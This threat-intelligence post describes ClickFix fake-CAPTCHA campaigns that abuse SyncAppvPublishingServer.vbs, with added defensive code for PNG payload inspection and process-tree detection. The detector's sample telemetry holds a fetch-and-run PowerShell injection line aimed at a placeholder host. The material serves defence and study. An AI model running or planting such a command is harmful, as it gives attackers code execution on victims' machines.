
ClickFix Malware Attacks Targeting Microsoft Windows: Fake CAPTCHAs, Signed Scripts, and Trusted Web Service Exploitation

  • Jan 28
  • 5 min read

Executive Summary

ClickFix attacks have rapidly evolved into a significant initial-access vector. The lure is a fake CAPTCHA or "fix this error" page that tricks the user into pasting a command the page has already placed on their clipboard; that command abuses a Microsoft-signed script and trusted web services (cloud and blockchain) for payload delivery and command-and-control (C2), ultimately installing information stealers and remote access tools. These campaigns are characterized by "living-off-the-land" (LotL) execution, polished social engineering, and infrastructure that is hard to block without collateral damage. They primarily target the enterprise and education sectors, with a marked increase in incidents affecting organizations in the United States, Europe, and Latin America. Because every stage runs under a trusted Windows component or talks to a reputable service, detections keyed on unsigned binaries or known-bad destinations tend to miss them, which makes these attacks particularly challenging to detect and mitigate.

Threat Actor Profile

The actors behind ClickFix attacks are a mix of financially motivated cybercriminals and advanced persistent threat (APT) groups. Notably, DarkHotel (attributed to South Korea) and BlueNoroff (North Korea) have been observed employing similar techniques, in particular abuse of SyncAppvPublishingServer.vbs for stealthy PowerShell execution. Microsoft has also tracked several threat clusters, including Storm-1607, Storm-0426, Storm-0249, and Storm-1877, conducting large-scale phishing and malvertising campaigns that use the ClickFix methodology. ClickFix builder kits are sold on underground forums as a Malware-as-a-Service (MaaS) style offering, reportedly for $200–$1,500 per month, which has lowered the bar to entry and enabled a far broader range of actors to run these campaigns.

Technical Analysis of Malware/TTPs

The ClickFix attack chain is notable for its multi-stage, highly evasive execution flow. Initial access typically begins with a phishing email, a malvertising redirect, or a compromised website that presents the victim with a fake CAPTCHA or verification page. The page's JavaScript silently writes an obfuscated command to the user's clipboard and instructs them to paste and run it in the Windows Run dialog (Win+R) or a terminal. The command invokes SyncAppvPublishingServer.vbs, a Microsoft-signed App-V script present on Enterprise, Education, and Server editions of Windows, through wscript.exe. The script builds a PowerShell command line from its argument and runs it with the execution policy bypassed; a semicolon inside that argument ends the intended Sync-AppvPublishingServer statement, so whatever follows is executed as arbitrary PowerShell. The resulting process tree (explorer.exe or the terminal, then wscript.exe running a signed Microsoft script, then powershell.exe) looks like routine App-V activity to application allow-listing and to detections that expect the browser or an unsigned binary as the parent, which is how the technique slips past many endpoint detection and response (EDR) rules.

Once running, the loader performs anti-sandbox checks and retrieves its configuration from a public Google Calendar ICS file, using a trusted third-party service as a dead-drop resolver so that no attacker-owned domain appears at this stage. Subsequent stages run as in-memory PowerShell scripts that fetch a PNG image from hosts such as gcdnb.pbrd[.]co and iili[.]io using WinINet APIs. The image carries an encrypted, compressed PowerShell payload, which is decrypted, decompressed, and executed in memory via Invoke-Expression without touching disk. The final stage is a shellcode loader that launches the actual malware: Amatera Stealer, Lumma Stealer, XWorm, AsyncRAT, and the r77 rootkit have all been observed.
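The analysis above says the downloaded PNG carries an encrypted, compressed PowerShell stage but not how the bytes are hidden inside the image. The following added example (written for this rewrite, not code from the original post or from any of the campaigns it names) shows one check an analyst can run on a suspect image: walk the PNG chunk structure, verify each CRC, and flag non-standard chunks or data appended after IEND, which is one common place to stash a payload. The carrier sample is constructed here with a zlib-compressed, single-byte-XOR "stage" appended after IEND; that scheme, the key, and the stage text are assumptions for illustration only.

```python
"""Inspect a PNG for smuggled payload data: non-standard chunks, bad CRCs,
and bytes after IEND.

Added example, not code from the original post. The carrier built below is
constructed: a zlib-compressed, single-byte-XOR blob appended after IEND
stands in for the campaign's encrypted, compressed stage, whose real scheme
the post does not describe.
"""
import math
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
STANDARD_CHUNKS = {
    b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"cHRM", b"gAMA", b"iCCP",
    b"sBIT", b"sRGB", b"tEXt", b"zTXt", b"iTXt", b"bKGD", b"hIST", b"pHYs",
    b"sPLT", b"tIME",
}


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte (8.0 = uniformly random, e.g. ciphertext)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def _chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body)
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def make_png(extra_chunks=(), trailing=b"") -> bytes:
    """Build a valid 1x1 8-bit greyscale PNG, optionally with extra chunks
    before IEND and/or bytes after it (constructed sample data)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, depth 8, grey
    idat = zlib.compress(b"\x00\x00")                    # filter byte + pixel
    png = PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat)
    for ctype, body in extra_chunks:
        png += _chunk(ctype, body)
    return png + _chunk(b"IEND", b"") + trailing


def inspect_png(data: bytes) -> dict:
    """Walk the chunk list and report anything a clean image would not have."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, chunks, findings = len(PNG_SIG), [], []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length                          # len + type + body + crc
        if end > len(data):
            findings.append("truncated chunk %s" % ctype.decode("latin-1"))
            pos = len(data)
            break
        body = data[pos + 8:pos + 8 + length]
        crc = struct.unpack(">I", data[end - 4:end])[0]
        name = ctype.decode("latin-1")
        if crc != zlib.crc32(ctype + body):
            findings.append("bad CRC on %s" % name)
        chunks.append((ctype, length))
        if ctype not in STANDARD_CHUNKS:
            findings.append("non-standard chunk %s (%d bytes, entropy %.2f)"
                            % (name, length, shannon_entropy(body)))
        pos = end
        if ctype == b"IEND":
            break
    trailing = data[pos:]
    if trailing:
        findings.append("%d bytes after IEND (entropy %.2f)"
                        % (len(trailing), shannon_entropy(trailing)))
    return {"chunks": chunks, "trailing": trailing, "findings": findings}


def xor_bytes(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def carve_trailing(data: bytes, key: bytes):
    """Recover a stage hidden after IEND under the assumed XOR+zlib scheme."""
    trailing = inspect_png(data)["trailing"]
    if not trailing:
        return None
    return zlib.decompress(xor_bytes(trailing, key))


# Constructed samples: a clean image and a carrier with an appended stage.
STAGE2 = b"# constructed stand-in for the next PowerShell stage\nWrite-Host 'stage 2'\n"
XOR_KEY = b"\x5a"                                         # assumption, illustration only
CLEAN_PNG = make_png()
CARRIER_PNG = make_png(trailing=xor_bytes(zlib.compress(STAGE2), XOR_KEY))

if __name__ == "__main__":
    for label, img in (("clean", CLEAN_PNG), ("carrier", CARRIER_PNG)):
        report = inspect_png(img)
        print(label, [c[0].decode() for c in report["chunks"]], report["findings"])
    print(carve_trailing(CARRIER_PNG, XOR_KEY).decode())
```

The entropy figure matters in practice: appended ciphertext or compressed data reads close to 8 bits per byte, while a stray copyright string after IEND does not, so the finding can be thresholded rather than alerted on blindly. Real carriers may instead hide data in an ancillary chunk or in pixel values; the chunk walk catches the first, the second needs an image-level comparison that this check does not attempt.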

The C2 infrastructure is resilient by design: configuration and payloads are staged on trusted services such as Google Calendar, the jsDelivr CDN, and the Binance BNB Smart Chain, which defenders cannot block outright, while exfiltration endpoints are rotated frequently. Variants such as JackFix, CrashFix, and GlitchFix use different lures and delivery methods, and the ErrTraffic Traffic Distribution System (TDS) deliberately breaks the rendering of a compromised page and offers a fake "fix" to push the user into the paste-and-run step.

Exploitation in the Wild

ClickFix attacks have been observed at scale, with Microsoft reporting that 47% of initial access attacks in the past year utilized this technique. A single ClearFake campaign resulted in over 147,000 infections, demonstrating the effectiveness and reach of these attacks. Notable campaigns include the use of fake browser updates and CAPTCHAs to deliver the Emmenhtal Loader and Lumma Stealer, as well as the Lampion campaign targeting government, finance, and transportation sectors in Portugal and other countries. The Amatera Stealer campaign leveraged Google Calendar and image steganography for payload delivery, while the OBSCURE#BAT campaign delivered the r77 rootkit via Discord-themed ClickFix lures.

The attacks are not limited to Windows environments; recent campaigns have targeted macOS users with Bash-based ClickFix lures delivering the AMOS stealer. The widespread availability of ClickFix builders and the support for multiple file distribution modes via the ErrTraffic TDS have enabled rapid adaptation and expansion of these campaigns across different platforms and geographies.

Victimology and Targeting

The primary targets of ClickFix attacks are organizations running Windows 10/11 Enterprise, Education, or Server editions, the environments in which SyncAppvPublishingServer.vbs is present by default. Sectors most affected include enterprise, education, government, financial services, and transportation, along with social-media creators and operators of monetized pages. Geographically, the United States, Canada, Portugal, Switzerland, Luxembourg, France, Hungary, Mexico, and Germany have seen significant activity.

Social engineering lures are tailored to the target audience, with recent campaigns focusing on social media creators by offering fake verification badges or urgent account updates. The use of fake CAPTCHAs, browser update prompts, system font errors, and video instructions increases the likelihood of user interaction and successful execution of the attack chain.

Mitigation and Countermeasures

Defending against ClickFix attacks requires a multi-layered approach. Organizations should monitor for execution of SyncAppvPublishingServer.vbs outside normal App-V operations, particularly when wscript.exe or cscript.exe is launched from explorer.exe or a terminal (a user pasting into Run) rather than by the App-V client, when the script's argument contains a semicolon, or when powershell.exe is spawned by the script host. Clipboard contents are rarely available to endpoint telemetry, so rather than alerting on clipboard events, key detections on the process tree and command lines described in the technical analysis; the pasted string also persists in the RunMRU key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer, which records Run-dialog history and is a useful forensic artifact during incident response.
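The wscript.exe-to-powershell.exe chain described in the technical analysis is what the monitoring recommended above should key on. The following added example (written for this rewrite; it is not the post's own detection content and not a vendor rule) runs that logic over constructed process-creation records shaped like Sysmon Event ID 1: it flags a script host running SyncAppvPublishingServer.vbs, a semicolon in the script's argument, an interactive parent such as explorer.exe, and PowerShell spawned by the script host, and it leaves a service-driven App-V refresh at "info" so the rule does not fire on every publishing sync. The benign refresh, the interactive-parent list and the suspicious-token list are assumptions to tune per environment.

```python
"""Flag the ClickFix / SyncAppvPublishingServer.vbs execution chain in
process-creation telemetry (e.g. Sysmon Event ID 1).

Added example, not code from the original post. Events are constructed dicts
carrying the fields a Sysmon record has; a real pipeline would read EVTX/XML
or an EDR export. The allow-lists below are assumptions to tune locally.
"""

SCRIPT_NAME = "syncappvpublishingserver.vbs"
CMDLET_NAME = "sync-appvpublishingserver"
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Parents that mean "a human typed or pasted this"; the Run dialog is explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}          # assumption
# Fragments that rarely appear in a legitimate App-V sync command line.
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring",
                     "frombase64string", "-enc")            # assumption


def _base(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _after_sync(cmdline: str) -> str:
    """Text following the script name (wscript side) or the cmdlet name
    (powershell side). The script splices its argument into a
    'Sync-AppvPublishingServer ...' command line, so a ';' in that text ends
    the intended statement and starts an attacker-chosen one."""
    low = cmdline.lower()
    for marker in (SCRIPT_NAME, CMDLET_NAME):
        i = low.find(marker)
        if i != -1:
            return low[i + len(marker):]
    return ""


def classify(events):
    """Return {pid: (severity, [reasons])} for every event worth a look."""
    by_pid = {e["pid"]: e for e in events}
    verdicts = {}
    for ev in events:
        image = _base(ev["image"])
        parent = by_pid.get(ev["ppid"])
        parent_image = _base(parent["image"]) if parent else ""
        low = ev["cmdline"].lower()
        reasons = []
        if image in SCRIPT_HOSTS and SCRIPT_NAME in low:
            reasons.append("script host running SyncAppvPublishingServer.vbs")
        if image in POWERSHELL and parent_image in SCRIPT_HOSTS:
            reasons.append("PowerShell spawned by %s" % parent_image)
        if not reasons:
            continue
        if ";" in _after_sync(ev["cmdline"]):
            reasons.append("';' after the App-V argument (command injection)")
        hits = [t for t in SUSPICIOUS_TOKENS if t in low]
        if hits:
            reasons.append("suspicious tokens: " + ", ".join(hits))
        if parent_image in INTERACTIVE_PARENTS:
            reasons.append("launched from %s (Run dialog / shell, not the App-V client)"
                           % parent_image)
        severity = "high" if len(reasons) > 1 else "info"
        verdicts[ev["pid"]] = (severity, reasons)
    return verdicts


# Constructed telemetry, not from a real incident.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 3000, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # Victim pasted the ClickFix command into Win+R: explorer.exe -> wscript.exe
    {"pid": 5210, "ppid": 4120, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\SyncAppvPublishingServer.vbs" "n; iex (irm http://example.invalid/1)"'},
    {"pid": 5222, "ppid": 5210,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Sync-AppvPublishingServer n; iex (irm http://example.invalid/1)"'},
    # Assumed benign App-V publishing refresh: service-driven, plain argument
    {"pid": 6001, "ppid": 900, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p -s Schedule"},
    {"pid": 6002, "ppid": 6001, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n"'},
    {"pid": 6003, "ppid": 6002,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Sync-AppvPublishingServer n"'},
]

if __name__ == "__main__":
    for pid, (severity, reasons) in sorted(classify(SAMPLE_EVENTS).items()):
        print(pid, severity, "; ".join(reasons))
```

Note that the benign refresh also runs powershell.exe with the execution policy bypassed, so "-ExecutionPolicy Bypass" alone is not a usable signal here; the semicolon, the download/evaluation tokens and the interactive parent are what separate the two chains. In a live deployment the same string should be cross-checked against the RunMRU key of the user's hive, which will hold exactly what was pasted into the Run dialog.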

Outbound connections to known malicious domains, including the image-hosting domains named above, should be blocked, and requests for public Google Calendar ICS files from endpoints (especially from PowerShell rather than a browser or mail client) should be monitored. Browser security should be hardened, and users should be trained to recognize fake CAPTCHAs, browser update prompts, and unsolicited verification requests as attacks. If App-V is not in use, restrict execution of SyncAppvPublishingServer.vbs with an AppLocker script rule or equivalent control, and monitor for its unexpected activation on endpoints.

Enable PowerShell script block logging and module logging so that the decrypted stages are captured as they execute. Setting the execution policy to AllSigned or RemoteSigned remains good hygiene, but it will not stop this chain: SyncAppvPublishingServer.vbs launches powershell.exe with the execution policy bypassed, and execution policy is not a security boundary. Use Microsoft Defender XDR and Microsoft Defender for Office 365 for detection, blocking, and threat hunting, leveraging the published hunting queries and detection rules. Where the Run command is not required, Group Policy can remove it (User Configuration > Administrative Templates > Start Menu and Taskbar > "Remove Run menu from Start Menu"), which also disables Win+R; this raises the bar but does not prevent a user from pasting the same command into a terminal or PowerShell window.

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their supply chain and digital ecosystem. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify and address emerging threats, ensuring robust protection for critical assets and business operations.

For further details, threat intelligence feeds, or custom detection rules, please contact Rescana at ops@rescana.com.
